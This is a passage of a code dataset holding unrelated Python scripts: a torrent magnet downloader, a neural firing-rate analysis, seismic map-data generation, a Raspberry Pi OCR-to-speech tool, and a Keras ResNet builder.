Download_Torrent_File(self):\n choose = int(input(\"select number: \"))\n for i in self.Informations(page=self.pg):\n if choose == int(i[0]):\n os.system(\"clear\")\n print(f\"[+] {i[1]}\")\n print(f\"[+] getting magnet\")\n content = self.Contents(f'https://1337x.to{i[5]}')\n magnet_link = content.find(\"div\", \"no-top-radius\").a[\"href\"]\n Download(magnet_link)\n print(\"\\n\\t download started .. 
\\n\")\n\ndef main(): \n inp = str(input(\"search: \"))\n a = Tdownloader(inp)\n print(f\"you search for '{a.get_title()}'\\n\")\n a.ShowInfo()\n a.select_page()\n a.Download_Torrent_File()\n\nif __name__ == '__main__':\n main()\n while True:\n again = input(\"do you want to search again?(y or n): \")\n if again == str('y'):\n main()\n elif again == str('n'):\n sys.exit()\n else:\n raise TypeError(\"bad choice\")\n sys.exit()\n","sub_path":"qbitDownloader/Tdownloader.py","file_name":"Tdownloader.py","file_ext":"py","file_size_in_byte":4515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"588475718","text":"\n\nfrom os.path import join\nimport numpy as np\nimport BrainDataAnalysis.neuroseeker_specific_functions as ns_funcs\nfrom ExperimentSpecificCode._2018_Chronic_Neuroseeker_TouchingLight._2019_06_25_AK_47p2 import constants as const\nfrom ExperimentSpecificCode._2018_Chronic_Neuroseeker_TouchingLight.Common_functions \\\n import events_sync_funcs as sync_funcs, firing_rates_sync_around_events_funcs as fr_funcs\nfrom BrainDataAnalysis.Spike_Sorting import positions_on_probe as spp\nfrom BrainDataAnalysis.Statistics import binning\nfrom BrainDataAnalysis.Statistics import binning, cluster_based_permutation_tests as cl_per\nfrom BrainDataAnalysis.Graphics import ploting_functions as plf\n\nfrom sklearn import preprocessing as preproc\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nimport common_data_transforms as cdt\nimport sequence_viewer as sv\nimport slider as sl\n\nfrom npeet.lnc import MI\n\n\n# -------------------------------------------------\n# \ndate_folder = 8\n\ndata_folder = join(const.base_save_folder, const.rat_folder, const.date_folders[date_folder], 'Data')\n\nkilosort_folder = join(const.base_save_folder, const.rat_folder, const.date_folders[date_folder], 'Analysis',\n 'Kilosort')\n\nevents_folder = join(data_folder, \"events\")\n\nanalysis_folder = join(const.base_save_folder, const.rat_folder, const.date_folders[date_folder], 'Analysis')\nresults_folder = join(analysis_folder, 'Results')\npoke_folder = join(results_folder, 'EventsCorrelations', 'Poke')\n\nevent_dataframes = ns_funcs.load_events_dataframes(events_folder, sync_funcs.event_types)\nfile_to_save_to = join(kilosort_folder, 'firing_rate_with_video_frame_window.npy')\ntemplate_info = pd.read_pickle(join(kilosort_folder, 'template_info.df'))\n\nspike_info = pd.read_pickle(join(kilosort_folder, 'spike_info_after_cleaning.df'))\n\nvideo_frame_spike_rates_filename = join(kilosort_folder, 'firing_rate_with_video_frame_window.npy')\nspike_rates = np.load(video_frame_spike_rates_filename)\n\nraw_data_filename = join(data_folder, 'Amplifier_APs.bin')\nraw_data = ns_funcs.load_binary_amplifier_data(raw_data_filename,\n number_of_channels=const.NUMBER_OF_AP_CHANNELS_IN_BINARY_FILE)\n\n# \n# -------------------------------------------------\n# \n\ncamera_pulses, beam_breaks, sounds = \\\n sync_funcs.get_time_points_of_events_in_sync_file(data_folder, clean=True,\n cam_ttl_pulse_period=\n const.CAMERA_TTL_PULSES_TIMEPOINT_PERIOD)\nsounds_dur = sounds[:, 1] - sounds[:, 0]\nreward_sounds = sounds[sounds_dur < 4000]\n\n# Using the trialend csv file to generate events\n# succesful_trials = event_dataframes['ev_trial_end'][event_dataframes['ev_trial_end']['Result'] == 'Food']\n# succesful_trials = succesful_trials['AmpTimePoints'].values\n\n# Using the start of the reward tone to generate events\n# There is a difference of 78.6 frames (+-2) between the reward tone 
and the csv file event (about 700ms)\nsuccesful_trials = reward_sounds[:, 0]\n\n# Get the average firing rates of all neurons a few seconds around the successful pokes\ntime_around_beam_break = 8\navg_firing_rate_around_suc_trials = fr_funcs.get_avg_firing_rates_around_events(spike_rates=spike_rates,\n event_time_points=succesful_trials,\n ev_video_df=event_dataframes['ev_video'],\n time_around_event=time_around_beam_break)\n# \n\n\n# -------------------------------------------------\n# \n# Find which neurons increase their firing rate on average around a successful poke\nincreasing_firing_rates_neuron_index, increasing_firing_rates = \\\n fr_funcs.get_neurons_following_pattern_around_an_event(avg_firing_rate_around_event=avg_firing_rate_around_suc_trials,\n time_around_pattern=time_around_beam_break,\n pattern_regions_to_compare=[0, 0.8, 1.0, 1.2],\n comparison_factor=4, comparison_direction='increase',\n baserate=0.1)\n\nfr_funcs.show_firing_rates_around_event(increasing_firing_rates)\n\n# Show where the neurons are in the brain\ntemplate_info_increasing_fr_neurons = template_info.iloc[increasing_firing_rates_neuron_index]\nspp.view_grouped_templates_positions(kilosort_folder, const.BRAIN_REGIONS, const.PROBE_DIMENSIONS,\n const.POSITION_MULT, template_info=template_info_increasing_fr_neurons)\n\npd.to_pickle(template_info_increasing_fr_neurons, join(poke_folder, 'ti_increasing_neurons_on_trial_pokes.df'))\n\n# Have a detailed look at the neuron with the largest increase\n# largest_increase_neuron_index = increasing_firing_rates_neuron_index[np.argmax(increasing_firing_rates_ratio)]\ntime_around_beam_break = 8\nindex = 0\nfig1 = plt.figure(1)\nfig2 = plt.figure(2)\noutput = None\nframes_around_beam_break = 120 * time_around_beam_break\ntime_points_around_beam_break = const.SAMPLING_FREQUENCY * time_around_beam_break\nargs = [increasing_firing_rates_neuron_index, avg_firing_rate_around_suc_trials, template_info, spike_info,\n succesful_trials, frames_around_beam_break, fig1, fig2]\n\nshow_rasters_increase = fr_funcs.show_rasters_for_live_update\n\nsl.connect_repl_var(globals(), 'index', 'output', 'show_rasters_increase', 'args',\n slider_limits=[0, len(increasing_firing_rates_neuron_index) - 1])\n\n# \n\n\n# -------------------------------------------------\n# \n# Find which neurons decrease their firing rate on average around a successful poke\ndecreasing_firing_rates_neuron_index, decreasing_firing_rates = \\\n fr_funcs.get_neurons_following_pattern_around_an_event(avg_firing_rate_around_event=avg_firing_rate_around_suc_trials,\n time_around_pattern=time_around_beam_break,\n pattern_regions_to_compare=[0, 0.8, 1.0, 1.2],\n comparison_factor=4, comparison_direction='decrease',\n baserate=0.1)\n\nfr_funcs.show_firing_rates_around_event(decreasing_firing_rates)\n\n# Show where the neurons are in the brain\ntemplate_info_decreasing_fr_neurons = template_info.iloc[decreasing_firing_rates_neuron_index]\nspp.view_grouped_templates_positions(kilosort_folder, const.BRAIN_REGIONS, const.PROBE_DIMENSIONS,\n const.POSITION_MULT, template_info=template_info_decreasing_fr_neurons)\n\npd.to_pickle(template_info_decreasing_fr_neurons, join(poke_folder, 'ti_decreasing_neurons_on_trial_pokes.df'))\n\n# Have a look at the neuron with the largest decrease\ntime_around_beam_break = 8\nindex = 0\nfig1 = plt.figure(1)\nfig2 = plt.figure(2)\noutput = None\nframes_around_beam_break = 120 *time_around_beam_break\nargs = [decreasing_firing_rates_neuron_index, avg_firing_rate_around_suc_trials, template_info, 
spike_info,\n succesful_trials, frames_around_beam_break, fig1, fig2]\n\nshow_rasters_decrease = fr_funcs.show_rasters_for_live_update\n\nsl.connect_repl_var(globals(), 'index', 'output', 'show_rasters_decrease', 'args',\n slider_limits=[0, len(decreasing_firing_rates_neuron_index) - 1])\n\n# \n\n\n# -------------------------------------------------\n# \nplt.plot(cdt.space_data(avg_firing_rate_around_suc_trials, 10).transpose())\n\ntouch_ball_trials = event_dataframes['ev_rat_touch_ball']\n\nframes_of_touch_ball_trials = sync_funcs.time_point_to_frame_from_video_df(event_dataframes['ev_video'],\n touch_ball_trials['AmpTimePoints'].values)\n\nfiring_rate_around_touch_trials = np.zeros((len(touch_ball_trials), len(spike_rates), 2 * frames_around_beam_break))\n\nfor f in np.arange(len(firing_rate_around_touch_trials)):\n frame = frames_of_touch_ball_trials[f]\n firing_rate_around_touch_trials[f, :, :] = spike_rates[:, frame - frames_around_beam_break:\n frame + frames_around_beam_break]\n\navg_firing_rate_around_touch_trials = firing_rate_around_touch_trials.mean(axis=0)\navg_firing_rate_around_touch_trials -= np.expand_dims(avg_firing_rate_around_touch_trials[:, :600].mean(axis=1), axis=1)\nplt.imshow(avg_firing_rate_around_touch_trials, vmax=avg_firing_rate_around_touch_trials.max(), vmin=0)\n\n# \n\n\n# -------------------------------------------------\n# \n\nall_pic_folder = join(results_folder, 'Images', 'Modulating_Neurons_On_Events', 'All_neurons')\nfig = plt.figure(0, figsize=(8, 6), dpi=150)\ntime_around_beam_break = 8\nframes_around_beam_break = 120 * time_around_beam_break\n\ndec_and_inc_neurons_indices = np.union1d(decreasing_firing_rates_neuron_index, increasing_firing_rates_neuron_index)\n\ny_positions = template_info['position Y'].values\nposition_sorted_indices = np.argsort(y_positions)\nfor index in position_sorted_indices:\n fig = fr_funcs.show_rasters(index, template_info, spike_info,\n succesful_trials, frames_around_beam_break, fig)\n template_number = template_info.iloc[index]['template number']\n firing_rate = \"%3.3f\" % template_info.iloc[index]['firing rate']\n y_position = int(template_info.iloc[index]['position Y'] * const.POSITION_MULT)\n in_group = 0\n if index in dec_and_inc_neurons_indices:\n in_group = 1\n plt.title('Template number = {}, Height on probe = {}, Firing rate = {} Hz, In group = {}'.format(str(template_number),\n str(y_position),\n firing_rate,\n str(in_group)))\n plt.savefig(join(all_pic_folder, 'height_{}_template_{}_index_{}.png'.format(str(y_position), str(template_number),\n str(index))))\n\n# \n\n\n# -------------------------------------------------\n# \n\ntime_around_beam_break = 0.1\ntimepoints_around_beam_break = int(const.SAMPLING_FREQUENCY * time_around_beam_break)\n\nvoltage_around_trials = np.empty((len(succesful_trials), const.NUMBER_OF_AP_CHANNELS_IN_BINARY_FILE,\n 2 * timepoints_around_beam_break))\nfor st in np.arange(len(succesful_trials)):\n voltage_around_trials[st, :, :] = raw_data[:, succesful_trials[st] - timepoints_around_beam_break:\n succesful_trials[st] + timepoints_around_beam_break]\n\navg_voltage_around_trials = np.mean(voltage_around_trials, axis=0)\n\n_ = plt.imshow(np.flipud(avg_voltage_around_trials), aspect='auto')\n# \n\n\n# -------------------------------------------------\n# \n\nsmooth_time = 0.5\nsmooth_frames = smooth_time * 120\n\nt = binning.rolling_window_with_step(avg_firing_rate_around_suc_trials, np.mean, smooth_frames, int(smooth_frames / 3))\ntn = preproc.normalize(t, norm='l1', axis=0)\n\ntn = 
np.asarray(t)\nfor i in np.arange(len(t)):\n tn[i, :] = binning.scale(t[i], 0, 1)\n\ny_positions = template_info['position Y'].values\nposition_sorted_indices = np.argsort(y_positions)\n\nregions_pos = list(const.BRAIN_REGIONS.values())\nregion_lines = []\nfor rp in regions_pos:\n region_lines.append(sync_funcs.find_nearest(y_positions[position_sorted_indices] * const.POSITION_MULT, rp)[0])\nregion_lines = np.array(region_lines)\n\ntns = tn[position_sorted_indices]\n\nplt.imshow(np.flipud(tns), aspect='auto')\nplt.hlines(y=len(t) - region_lines, xmin=0, xmax=len(tns[0])-1, linewidth=3, color='w')\nplt.vlines(x=int(len(tns[0]) / 2), ymin=0, ymax=len(tns) - 1)\n\n\nplt.imshow(np.flipud(tns), aspect='auto', extent=[-8, 8, len(tns), 0])\nplt.hlines(y=len(t) - region_lines, xmin=-8, xmax=8, linewidth=2, color='w')\nplt.vlines(x=0, ymin=0, ymax=len(tns) - 1)\n\n\ni = 0\nsv.graph_pane(globals(), 'i', 'tn')\n\n\ntime_around_beam_break = 8\nindex = 0\nfig1 = plt.figure(1)\nfig2 = plt.figure(2)\noutput = None\nall_indices = np.arange(len(avg_firing_rate_around_suc_trials))\nframes_around_beam_break = 120 *time_around_beam_break\nargs = [all_indices, avg_firing_rate_around_suc_trials, template_info, spike_info,\n succesful_trials, frames_around_beam_break, fig1, fig2]\n\nshow_rasters_decrease = fr_funcs.show_rasters_for_live_update\n\nsl.connect_repl_var(globals(), 'index', 'output', 'show_rasters_decrease', 'args',\n slider_limits=[0, len(avg_firing_rate_around_suc_trials) - 1])\n# \n\n# -------------------------------------------------\n# \n\nfr_norm_sorted = tns\n\ncov = np.cov(fr_norm_sorted)\n\n\n# MUTUAL INFO BETWEEN RATES\nn = 0\nmutual_infos = []\nfor rate1 in fr_norm_sorted:\n for rate2 in fr_norm_sorted:\n mutual_infos.append(MI.mi_LNC([rate1.tolist(), rate2.tolist()],\n k=10, base=np.exp(1), alpha=0.4, intens=1e-10))\n n += 1\n print('Done neuron {}'.format(str(n)))\n\n\nmutual_infos = np.reshape(np.array(mutual_infos), (fr_norm_sorted.shape[0], fr_norm_sorted.shape[0]))\nnp.save(join(analysis_folder, 'Results', 'MutualInformation',\n 'mutual_infos_NSprobe_spike_rates_vs_spike_rates_all_neurons_around_succ_trials.npy'), mutual_infos)\n\n# \n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# \n\ntime_around_beam_break = 8\nfiring_rate_around_suc_trials, _ = fr_funcs.get_avg_firing_rates_around_events(spike_rates=spike_rates,\n event_time_points=succesful_trials,\n ev_video_df=event_dataframes['ev_video'],\n time_around_event=time_around_beam_break,\n keep_trials=True)\n\nevents_random = np.random.choice(np.arange(succesful_trials.min(), succesful_trials.max(), 100),\n len(succesful_trials), replace=False)\nfiring_rate_around_random_times, _ = fr_funcs.get_avg_firing_rates_around_events(spike_rates=spike_rates,\n event_time_points=events_random,\n ev_video_df=event_dataframes['ev_video'],\n time_around_event=time_around_beam_break,\n keep_trials=True)\n\ny_positions = template_info['position Y'].values\nposition_sorted_indices = np.argsort(y_positions)\n\nregions_pos = list(const.BRAIN_REGIONS.values())\nregion_lines = []\nfor rp in regions_pos:\n region_lines.append(sync_funcs.find_nearest(y_positions[position_sorted_indices] * const.POSITION_MULT, rp)[0])\nregion_lines = np.array(region_lines)\n\nsmooth_time = 0.5\nsmooth_frames = smooth_time * 120\n\nt = binning.rolling_window_with_step(firing_rate_around_suc_trials[0, :, :], np.mean, smooth_frames,\n int(smooth_frames / 3))\n\n\ntrials = 
firing_rate_around_suc_trials.shape[0]\nneurons = firing_rate_around_suc_trials.shape[1]\ntimebins = t.shape[1]\ntimebined = np.empty((trials, neurons, timebins))\ntimebined_sorted_frs_around_suc_trials = np.empty((trials, neurons, timebins))\ntimebined_sorted_frs_around_random = np.empty((trials, neurons, timebins))\ntimebined_sorted_normalised_frs_around_suc_trials = np.empty((trials, neurons, timebins))\ntimebined_sorted_normalised_frs_around_random = np.empty((trials, neurons, timebins))\n\nfor trial in np.arange(trials):\n timebined[trial, :, :] = binning.rolling_window_with_step(firing_rate_around_suc_trials[trial, :, :], np.mean,\n smooth_frames, int(smooth_frames / 3))\n\n timebined_sorted = timebined[trial, position_sorted_indices, :]\n\n timebined_sorted_frs_around_suc_trials[trial, :, :] = timebined_sorted\n\n for neuron in np.arange(neurons):\n timebined_sorted_normalised_frs_around_suc_trials[trial, neuron, :] = \\\n binning.scale(timebined_sorted_frs_around_suc_trials[trial, neuron, :], 0, 1)\n\n timebined[trial, :, :] = binning.rolling_window_with_step(firing_rate_around_random_times[trial, :, :], np.mean,\n smooth_frames, int(smooth_frames / 3))\n\n timebined_sorted = timebined[trial, position_sorted_indices, :]\n\n timebined_sorted_frs_around_random[trial, :, :] = timebined_sorted\n\n for neuron in np.arange(neurons):\n timebined_sorted_normalised_frs_around_random[trial, neuron, :] = \\\n binning.scale(timebined_sorted_frs_around_random[trial, neuron, :], 0, 1)\n\navg_timebined_sorted_frs_around_suc_trials = np.mean(timebined_sorted_frs_around_suc_trials, axis=0)\navg_timebined_sorted_frs_around_random = np.mean(timebined_sorted_frs_around_random, axis=0)\n\navg_timebined_sorted_normalised_frs_around_suc_trials = np.empty((neurons, timebins))\nfor neuron in np.arange(neurons):\n avg_timebined_sorted_normalised_frs_around_suc_trials[neuron, :] = \\\n binning.scale(avg_timebined_sorted_frs_around_suc_trials[neuron, :], 0, 1)\n\navg_timebined_sorted_normalised_frs_around_random = np.empty((neurons, timebins))\nfor neuron in np.arange(neurons):\n avg_timebined_sorted_normalised_frs_around_random[neuron, :] = \\\n binning.scale(avg_timebined_sorted_frs_around_random[neuron, :], 0, 1)\n\n\n# Normalising the average is not the same as averaging the normalised trials!\n# The following scales individual trials so when they get averaged the result is going to be normalised\ntimebined_sorted_special_normalised_frs_around_suc_trials = np.empty((trials, neurons, timebins))\ntimebined_sorted_special_normalised_frs_around_random = np.empty((trials, neurons, timebins))\n\nfor neuron in np.arange(neurons):\n\n X_max_suc = np.mean(timebined_sorted_frs_around_suc_trials, axis=0)[neuron].max()\n X_min_suc = np.mean(timebined_sorted_frs_around_suc_trials, axis=0)[neuron].min()\n\n X_max_rand = np.mean(timebined_sorted_frs_around_random, axis=0)[neuron].max()\n X_min_rand = np.mean(timebined_sorted_frs_around_random, axis=0)[neuron].min()\n\n for trial in np.arange(trials):\n\n timebined_sorted_special_normalised_frs_around_suc_trials[trial, neuron] = \\\n binning.scale(timebined_sorted_frs_around_suc_trials[trial, neuron, :], 0, 1, X_min_suc, X_max_suc)\n\n timebined_sorted_special_normalised_frs_around_random[trial, neuron] = \\\n binning.scale(timebined_sorted_frs_around_random[trial, neuron, :], 0, 1, X_min_rand, X_max_rand)\n\nplt.figure(0)\nplt.imshow(np.flipud(np.mean(timebined_sorted_special_normalised_frs_around_suc_trials, axis=0)), aspect='auto')\nplt.hlines(y=neurons - 
region_lines, xmin=0, xmax=timebins-1, linewidth=3, color='w')\nplt.vlines(x=int(timebins / 2), ymin=0, ymax=neurons - 1)\n\ntimebined_sorted_frs_around_suc_trials_tr = np.transpose(timebined_sorted_frs_around_suc_trials, [1, 2, 0])\ntimebined_sorted_frs_around_random_tr = np.transpose(timebined_sorted_frs_around_random, [1, 2, 0])\np_values_pokes_vs_random, cluster_labels_poke_vs_random = \\\n cl_per.monte_carlo_significance_probability(timebined_sorted_frs_around_suc_trials_tr, timebined_sorted_frs_around_random_tr,\n num_permutations=1000, min_area=8, cluster_alpha=0.05,\n monte_carlo_alpha=0.05, sample_statistic='independent',\n cluster_statistic='maxsum')\n\ndata = avg_timebined_sorted_normalised_frs_around_suc_trials\ncluster_labels = cluster_labels_poke_vs_random\nplf.show_significant_clusters_on_data(data, cluster_labels, region_lines, np.arange(neurons), window_time=8,\n colormap='binary', markers='o', alpha=0.6)\n\n\n# \n# ----------------------------------------------------------------------------------------------------------------------\n\n","sub_path":"ExperimentSpecificCode/_2018_Chronic_Neuroseeker_TouchingLight/_2019_06_25_AK_47p2/Correlations/Time_locked_to_events/firing_rates_time_locked_on_succesful_trials.py","file_name":"firing_rates_time_locked_on_succesful_trials.py","file_ext":"py","file_size_in_byte":21509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"534935297","text":"#!/usr/bin/env python\n\"\"\"\nMap plot\n\"\"\"\nimport os, json\nimport numpy as np\nimport pyproj\nfrom obspy.imaging import beachball\nimport cst\n\n# parameters\npath = os.path.join('run', 'map-data') + os.sep\nos.mkdir(path)\neventid = 14383980\nbounds = [[-80000.0, 48000.0], [-58000.0, 54000.0]]\nmts = os.path.join('run', 'data', '%s.mts.json' % eventid)\nmts = json.load(open(mts))\norigin = mts['longitude'], mts['latitude'], mts['depth']\nproj = pyproj.Proj(proj='tmerc', lon_0=origin[0], lat_0=origin[1])\n\n# extent\nx, y = bounds\nx = [x[0], x[1], x[1], x[0]]\ny = [y[0], y[0], y[1], y[1]]\nx, y = np.array(proj(x, y, inverse=True))\nextent = [[x.min(), x.max()], [y.min(), y.max()]]\n\n# source\nm = mts['double_couple_clvd']\nm = m['mzz'], m['mxx'], m['myy'], m['mxz'], -m['myz'], -m['mxy']\nb = beachball.Beach(m, width=200)\np = []\nfor c in b.get_paths():\n p += c.to_polygons() + [[[float('nan'), float('nan')]]]\ndel p[-1]\nb = np.concatenate(p) * 0.005\nf = path + 'Beachball.npy'\nnp.save(f, b.astype('f').T)\n\n# coastlines and boarders\nx, y = cst.data.mapdata('coastlines', 'high', extent, 10.0)\nx -= 360.0\nf = path + 'Coastlines.npy'\nnp.save(f, np.array([x, y], 'f'))\n\n# topography\nxx, yy, zz = cst.data.dem(extent, mesh=True)\nx, y = cst.plt.contour(xx, yy, zz, [1000])[0]\nf = path + 'Mountains.npy'\nnp.save(f, np.array([x, y], 'f'))\n\n# surface\nzz.fill(0.0)\nfor cvm, vv in [\n ['cvmg', cst.cvmh.extract(xx, yy, zz, 'vs')],\n ['cvmh', cst.cvmh.extract(xx, yy, zz, 'vs', vs30=None)],\n ['cvms', cst.cvms.extract(xx, yy, zz, 'vs')],\n]:\n f = path + 'Surface-Vs-%s.npy' % cvm\n np.save(f, vv[0].astype('f'))\n\n# cvm basins\nzz.fill(1000.0)\nfor cvm, vv in [\n ('cvmh', cst.cvmh.extract(xx, yy, zz, 'vs', vs30=None)),\n ('cvms', cst.cvms.extract(xx, yy, zz, 'vs')),\n]:\n v = 2500,\n x, y = cst.plt.contour(xx, yy, vv[0], v)[0]\n f = path + 'Basins-%s.npy' % cvm.upper()\n np.save(f, np.array([x, y], 
'f'))\n","sub_path":"scripts/Chino-Hills/map-data.py","file_name":"map-data.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"253533032","text":"\"\"\"!\n@file CV_algo.py\n\n@brief\nThis is the main section of code for the CV algorithm; it handles all image, translation, and audio processing for the device.\n\"\"\"\n\n## @package convert_to_speech\n# This package is used for the text-to-speech module built on gTTS.\nimport convert_to_speech \n\n## @package cv2\n# This package is used for all image handling and image processing.\nimport cv2 \n\n## @package pytesseract\n# This package is used for optical character recognition to retrieve text from a picture.\nimport pytesseract \n\n## @package subprocess \n# This package is used to run external processes such as VLC, amixer, and dbus-send.\nimport subprocess \n\n## @package time\n# This package is mostly used for button debouncing.\nimport time \n\n## @package googletrans\n# This package is used for the translation functionality of the processing.\nfrom googletrans import Translator \n\n## @package led\n# This is the led.py script located within Software that was used for testing.\n#import led \n\n## @package pygame\n# This package is used to output audio cues for the user.\nimport pygame \n\n\n#------------------------------GLOBAL VARIABLES------------------------------------------------#\n#USES GOOGLE TRANSLATE LANGUAGE CODES NOT TESSERACT LANGUAGE CODES\n#Cycles through 3 languages: English, Hindi, Telugu\n#To add more languages: add the appropriate code and update the languages list accordingly\n\n## This is the languages array that is used for language translation and selection\nlanguages = ['en', 'hi', 'te']\n\n#--------------------------INTERRUPT ROUTINES AND OTHER FUNCTIONS------------------------------#\n#Function to play audio cues for button presses:\ndef playCue(fn):\n    \"\"\"!\n    Function to play audio cues for button presses\n\n    @param fn This is the soundbite that is loaded in and is ready to be used as an audio cue\n\n    @return Technically no return in the function but an audio cue is output to the user\n    \"\"\"\n    pygame.mixer.init()\n    pygame.mixer.music.load(fn)\n    pygame.mixer.music.play()\n    \n#Interrupt Routine TO PAUSE/PLAY THE VLC player\ndef PlayPause(channel):\n    \"\"\"!\n    Function to pause or resume audio on button press\n\n    @param channel Current audio channel that is being used.\n\n    @return Technically no return in the function but the current output audio will be paused or resumed\n    \"\"\"\n    subprocess.run('dbus-send --type=method_call --dest=org.mpris.MediaPlayer2.vlc /org/mpris/MediaPlayer2 org.mpris.MediaPlayer2.Player.PlayPause', shell = True)\n    print('PAUSE BUTTON PRESSED')\n    time.sleep(1) #For debouncing \n\n#Interrupt Routine TO STOP THE VLC player output\ndef StopPlayback(channel): \n    \"\"\"!\n    Function to stop all audio on button press\n\n    @param channel Current audio channel that is being used.\n\n    @return Technically no return in the function but the current output audio will be stopped.\n    \"\"\" \n    #EndOutput will direct to the first program\n    EndOutput()\n    print('STOP BUTTON PRESSED')\n    time.sleep(1) #For debouncing\n\n#Interrupt Routine to increase the volume using amixer\ndef VolumeUp(channel):\n    \"\"\"!\n    Function to increase volume on button press\n\n    @param channel Current audio channel that is being used.\n\n    @return Technically no return in the function but the current 
volume will be increased.\n \"\"\"\n print('Volume increased')\n subprocess.run('amixer set Master 10%+',shell = True)\n #subprocess.run('amixer -D pulse sset Master 10%+',shell = True)\n time.sleep(1) #For debouncing\n \n#Interrupt Routine to decrease the volume using amixer \ndef VolumeDown(channel):\n \"\"\"!\n Function to decrease volume on button press\n\n @param channel Current audio channel that is being used.\n\n @return Technically no return in the function but the current volume will be decreased\n \"\"\"\n print('Volume decreased')\n subprocess.run('amixer set Master 10%-',shell = True)\n #subprocess.run('amixer -D pulse sset Master 10%-',shell = True)\n time.sleep(1) #For debouncing\n\n#Function to check if VLC process is running: (Used in Spd_Change and EndOutput functions)\ndef CheckforVLC():\n \"\"\"!\n Function to check if VLC process is running: (Used in Spd_Change and EndOutput functions) \n \"\"\"\n out = \"\"\n try:\n out = subprocess.check_output([\"pidof\",\"vlc\"])\n except:\n pass\n if out != \"\" :\n return True\n else:\n playCue('/home/pi/SoundBites/No_VLC.mp3')\n return False\n \n#function to change speed output:\ndef SpeedChange(x):\n \"\"\"!\n Function to change speed on button press\n\n @param x Current speed setting that needs the audio to be set to \n\n @return Technically no return in the function but the current audio output will have its speed changed\n \"\"\"\n subprocess.run('dbus-send --print-reply --session --dest=org.mpris.MediaPlayer2.vlc /org/mpris/MediaPlayer2 org.freedesktop.DBus.Properties.Set string:org.mpris.MediaPlayer2.Player string:Rate variant:double:%f' % x, shell = True)\n time.sleep(0.5)\n \n#function to end output:\ndef EndOutput():\n \"\"\"!\n Function to end all VLC output.\n \"\"\"\n if (CheckforVLC()):\n subprocess.run('killall vlc', shell = True)\n playCue('/home/pi/SoundBites/Stopped.mp3')\n else:\n print(\"No VLC Stopped.\")\n \n#MAIN Computer Vision algorithm----------------------------------------------->\ndef CV(l):\n \"\"\"!\n Function that serves as the main CV algorithm as well as the picture-to-audio processing.\n\n @param l Current language index setting that needs to be used for the languages array.\n\n @return Technically no return in the function but the requested input picture will have its audio output to the user in the correct translation.\n \"\"\"\n\n ##l is the language index and is set in the main program and passed into CV\n lang_index=l \n #led.blink() #!Debug Line\n\n #pytesseract.pytesseract.tesseract_cmd = 'C:\\\\Program Files\\\\Tesseract-OCR\\\\tesseract.exe' #!FOR TESTING SHOULD BE UNNECESSARY WITH LINUX\n\n #----------------------------------------------------------------Read in image----------------------------------------------------------------\n ##This is the current image that was captured from camera.py\n img = cv2.imread('/home/pi/Pictures/input.png')\n #img = cv2.imread('skew.jpg') #!FOR TESTING\n\n #-----------------------------------------------------Perform preprocessing of the image------------------------------------------------------\n\n #Grayscale conversion\n grayscale = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n #Gaussian blur conversion\n gaussian = cv2.GaussianBlur(grayscale, (1,1), 0)\n\n #Threshold conversion\n ret, threshold = cv2.threshold(grayscale,0,255,cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)\n\n #!FOR TESTING\n #cv2.imshow('test.png',rotated)\n #cv2.waitKey(0)\n #cv2.destroyAllWindows()\n\n #---------------------------------------------------------Convert the image to 
text---------------------------------------------------------\n custom_config = r'--oem 3 --psm 6'\n text = pytesseract.image_to_string(img, lang=\"eng+hin+tel\", config=custom_config) #TODO: Need to fix the language part\n \n #!FOR TESTING\n #led.blink()\n #led.blink()\n #print(text) \n \n ##This is the translator object to be used for translation.\n translator = Translator()\n\n ##This is the translation generated from the translate function from googletrans\n translation = translator.translate(text, dest=languages[lang_index])\n\n #!FOR TESTING\n print(translation.text)\n\n #---------------------------------------------------------Convert the text to an mp3--------------------------------------------------------\n convert_to_speech.txt_to_mp3(translation.text, languages[lang_index]) #use the convert_to_speech.py to achieve mp3 file\n\n #-------------------------------------------------------------Play the audio----------------------------------------------------------------\n subprocess.run('killall vlc', shell = True) #first terminate all vlc outputs\n subprocess.run('cvlc /home/pi/Pictures/speech_output.mp3 --play-and-exit', shell = True) #PLAY IN VLC","sub_path":"Software/CV_algo.py","file_name":"CV_algo.py","file_ext":"py","file_size_in_byte":8359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"304792699","text":"import re\nfrom tensorflow.python.keras import Sequential\nfrom tensorflow.python.keras.layers import GlobalAveragePooling2D, Dense, Conv2D\n\nfrom layers import ConvBNRelu, ConvBNReluResidualBlock, ConvBNReluBlock\n\n\ndef make_resnet(net):\n match = re.match(r'([a-z]*)(\\d+)', net)\n net_type, n_layers = match.group(1), match.group(2)\n residual = (net_type == 'resnet')\n n = (int(n_layers) - 2) // 6\n print(\"Net: detected n = {} {} shortcuts\".format(n, 'with' if residual else 'without'))\n\n Block = ConvBNReluResidualBlock if residual else ConvBNReluBlock\n _layers = [\n ConvBNRelu(strides=1, filters=16, input_shape=(32, 32, 3)),\n\n Block(strides=1, filters=16),\n [Block(strides=1, filters=16) for _ in range(n - 1)],\n\n Block(strides=2, filters=32),\n [Block(strides=1, filters=32) for _ in range(n - 1)],\n\n Block(strides=2, filters=64),\n [Block(strides=1, filters=64) for _ in range(n - 1)],\n\n GlobalAveragePooling2D(),\n Dense(10, 'softmax')\n ]\n\n layers = []\n for x in _layers:\n try:\n for l in x:\n layers.append(l)\n except TypeError:\n layers.append(x)\n\n model = Sequential(layers)\n model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['acc'])\n return model\n","sub_path":"runs/_sources/resnet_67ecce94d2a0ad7d429f9ba404e9b28b.py","file_name":"resnet_67ecce94d2a0ad7d429f9ba404e9b28b.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"264335028","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Dec 3 08:50:59 2018\n\n@author: Ruth\n\"\"\"\n\n\nimport csv\n\n\n\nruns=[]\n\nrow_num= 2\nwith open(\"cr1.tsv\") as csvfile:\n reader = csv.DictReader(csvfile, 